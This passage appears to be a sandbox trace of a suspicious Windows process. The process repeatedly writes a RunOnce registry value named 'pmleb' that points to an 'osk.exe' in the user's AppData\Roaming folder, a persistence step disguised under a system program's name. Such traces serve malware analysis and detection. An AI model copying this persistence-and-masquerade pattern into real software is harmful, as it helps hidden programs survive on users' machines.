Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.464] RegCloseKey (hKey=0x280) returned 0x0 [0111.464] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.464] SetTimer (hWnd=0x20280, nIDEvent=0x249b, uElapse=0xa, lpTimerFunc=0x0) returned 0x249b [0111.464] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.485] KillTimer (hWnd=0x20280, uIDEvent=0x249b) returned 1 [0111.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.486] RegCloseKey (hKey=0x280) returned 0x0 [0111.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.487] SetTimer (hWnd=0x20280, nIDEvent=0x249c, uElapse=0xa, lpTimerFunc=0x0) returned 0x249c [0111.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.506] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.506] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.506] KillTimer (hWnd=0x20280, uIDEvent=0x249c) returned 1 [0111.507] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.507] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.507] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.508] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.508] RegCloseKey (hKey=0x280) returned 0x0 [0111.508] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.508] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.508] SetTimer (hWnd=0x20280, nIDEvent=0x249d, uElapse=0xa, lpTimerFunc=0x0) returned 0x249d [0111.508] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.515] KillTimer (hWnd=0x20280, uIDEvent=0x249d) returned 1 [0111.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.515] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.515] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.516] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.516] RegCloseKey (hKey=0x280) returned 0x0 [0111.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.516] SetTimer (hWnd=0x20280, nIDEvent=0x249e, uElapse=0xa, lpTimerFunc=0x0) returned 0x249e [0111.516] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.530] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.530] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.530] KillTimer (hWnd=0x20280, uIDEvent=0x249e) returned 1 [0111.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.531] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.531] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.531] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.532] RegCloseKey (hKey=0x280) returned 0x0 [0111.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.532] SetTimer (hWnd=0x20280, nIDEvent=0x249f, uElapse=0xa, lpTimerFunc=0x0) returned 0x249f [0111.532] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.998] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.998] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.999] KillTimer (hWnd=0x20280, uIDEvent=0x249f) returned 1 [0111.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.999] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.000] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.000] RegCloseKey (hKey=0x280) returned 0x0 [0112.000] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.000] SetTimer (hWnd=0x20280, nIDEvent=0x24a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a0 [0112.000] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.014] KillTimer (hWnd=0x20280, uIDEvent=0x24a0) returned 1 [0112.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.014] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.015] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.015] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.015] RegCloseKey (hKey=0x280) returned 0x0 [0112.015] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.016] SetTimer (hWnd=0x20280, nIDEvent=0x24a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a1 [0112.016] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.029] KillTimer (hWnd=0x20280, uIDEvent=0x24a1) returned 1 [0112.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.030] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.030] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.031] RegCloseKey (hKey=0x280) returned 0x0 [0112.031] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.031] SetTimer (hWnd=0x20280, nIDEvent=0x24a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a2 [0112.031] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.045] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.045] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.045] KillTimer (hWnd=0x20280, uIDEvent=0x24a2) returned 1 [0112.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.046] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.046] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.047] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.047] RegCloseKey (hKey=0x280) returned 0x0 [0112.047] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.047] SetTimer (hWnd=0x20280, nIDEvent=0x24a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a3 [0112.047] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.060] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.060] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.060] KillTimer (hWnd=0x20280, uIDEvent=0x24a3) returned 1 [0112.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.061] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.061] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.062] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.062] RegCloseKey (hKey=0x280) returned 0x0 [0112.062] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.062] SetTimer (hWnd=0x20280, nIDEvent=0x24a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a4 [0112.062] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.076] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.076] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.077] KillTimer (hWnd=0x20280, uIDEvent=0x24a4) returned 1 [0112.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.077] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.078] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.078] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.078] RegCloseKey (hKey=0x280) returned 0x0 [0112.078] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.078] SetTimer (hWnd=0x20280, nIDEvent=0x24a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a5 [0112.078] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.092] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.092] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.092] KillTimer (hWnd=0x20280, uIDEvent=0x24a5) returned 1 [0112.092] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.093] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.093] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.093] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.093] RegCloseKey (hKey=0x280) returned 0x0 [0112.093] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.093] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.094] SetTimer (hWnd=0x20280, nIDEvent=0x24a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a6 [0112.094] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.117] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.117] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.117] KillTimer (hWnd=0x20280, uIDEvent=0x24a6) returned 1 [0112.117] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.118] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.118] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.118] RegCloseKey (hKey=0x280) returned 0x0 [0112.118] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.118] SetTimer (hWnd=0x20280, nIDEvent=0x24a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a7 [0112.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.123] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.123] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.123] KillTimer (hWnd=0x20280, uIDEvent=0x24a7) returned 1 [0112.123] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.124] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.124] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.124] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.124] RegCloseKey (hKey=0x280) returned 0x0 [0112.124] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.124] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.124] SetTimer (hWnd=0x20280, nIDEvent=0x24a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a8 [0112.124] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.139] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.139] KillTimer (hWnd=0x20280, uIDEvent=0x24a8) returned 1 [0112.139] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.139] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.140] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.140] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.140] RegCloseKey (hKey=0x280) returned 0x0 [0112.140] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.140] SetTimer (hWnd=0x20280, nIDEvent=0x24a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a9 [0112.140] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.156] KillTimer (hWnd=0x20280, uIDEvent=0x24a9) returned 1 [0112.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.157] RegCloseKey (hKey=0x280) returned 0x0 [0112.158] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.158] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.158] SetTimer (hWnd=0x20280, nIDEvent=0x24aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x24aa [0112.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.169] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.169] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.170] KillTimer (hWnd=0x20280, uIDEvent=0x24aa) returned 1 [0112.170] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.170] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.170] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.171] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.171] RegCloseKey (hKey=0x280) returned 0x0 [0112.171] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.171] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.171] SetTimer (hWnd=0x20280, nIDEvent=0x24ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ab [0112.171] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.185] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.185] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.185] KillTimer (hWnd=0x20280, uIDEvent=0x24ab) returned 1 [0112.185] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.186] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.186] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.186] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.186] RegCloseKey (hKey=0x280) returned 0x0 [0112.187] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.187] SetTimer (hWnd=0x20280, nIDEvent=0x24ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ac [0112.187] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.201] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.201] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.201] KillTimer (hWnd=0x20280, uIDEvent=0x24ac) returned 1 [0112.201] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.202] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.202] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.202] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.202] RegCloseKey (hKey=0x280) returned 0x0 [0112.202] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.202] SetTimer (hWnd=0x20280, nIDEvent=0x24ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x24ad [0112.203] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.216] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.216] 